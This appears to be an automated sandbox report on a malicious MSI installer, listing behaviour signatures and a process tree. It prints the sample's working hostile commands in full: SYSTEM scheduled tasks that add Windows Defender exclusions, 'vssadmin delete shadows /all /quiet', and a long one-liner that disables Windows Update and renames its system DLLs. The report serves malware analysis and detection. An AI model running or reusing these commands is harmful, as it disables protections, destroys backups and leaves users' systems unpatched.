Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    01/08/2026, 04:15

General

  • Target
    install_c0rd007.msi
  • Size 8.8MB
  • Sample260801-evknzadr21
  • SHA256 97e0f91f71d4852b478bc260ee633a16312225696b04c678f771d6e462af34dd
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 5 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 25 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_c0rd007.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2312
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3552
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding D5F914118A79BFEE7ED052D9A4DE74CA E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1216
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3700
  • C:\Users\Public\CmbmfX\cORmam.exe
    C:\Users\Public\CmbmfX\cORmam.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4864
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\CmbmfX\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1564
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\CmbmfX\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5040
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:712
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4264
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:668
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2136
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3736
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:4304
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1864
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4536
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:3828
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:5000
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1496
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2800
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2532
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2224
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3112
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4408
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1988
                        • C:\Program Files (x86)\DVc97R\DVc97R.exe
                          "C:\Program Files (x86)\DVc97R\DVc97R.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4200
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\DVc97R" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2284
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\DVc97R" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2800
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4536
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3772
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2332
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2364
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4588
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4724
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3348
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4832
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1744
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:1684
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4376
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                  PID:1800
                              • C:\Windows\SysWOW64\sc.exe
                                sc config uhssvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4308
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure uhssvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4816
                              • C:\Windows\SysWOW64\net.exe
                                net stop WaaSMedicSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:696
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                  5⤵
                                    PID:4364
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WaaSMedicSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:4776
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3616
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:3316
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:5064
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3552
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:3752
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\wuaueng.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:2632
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3504
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:688
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:764
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3200
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4928
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2688
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  PID:3148
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo.>c:\xxxx.ini
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3880
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\DVc97R\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • Suspicious use of WriteProcessMemory
                                PID:116
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\DVc97R\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:364
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2288
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:1624
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:2080
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1660
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                      PID:1996
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                        PID:3804
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:540
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3312
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3736
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4800
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\DVc97R" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4572
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\DVc97R" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:3756
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:3360
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4988
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                          PID:4060
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2008
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:5076
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:1496
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:4616
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:1868
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                        3⤵
                                        • Indicator Removal: Clear Persistence
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:4164
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4604
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Run /TN "Task1"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4932
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4300
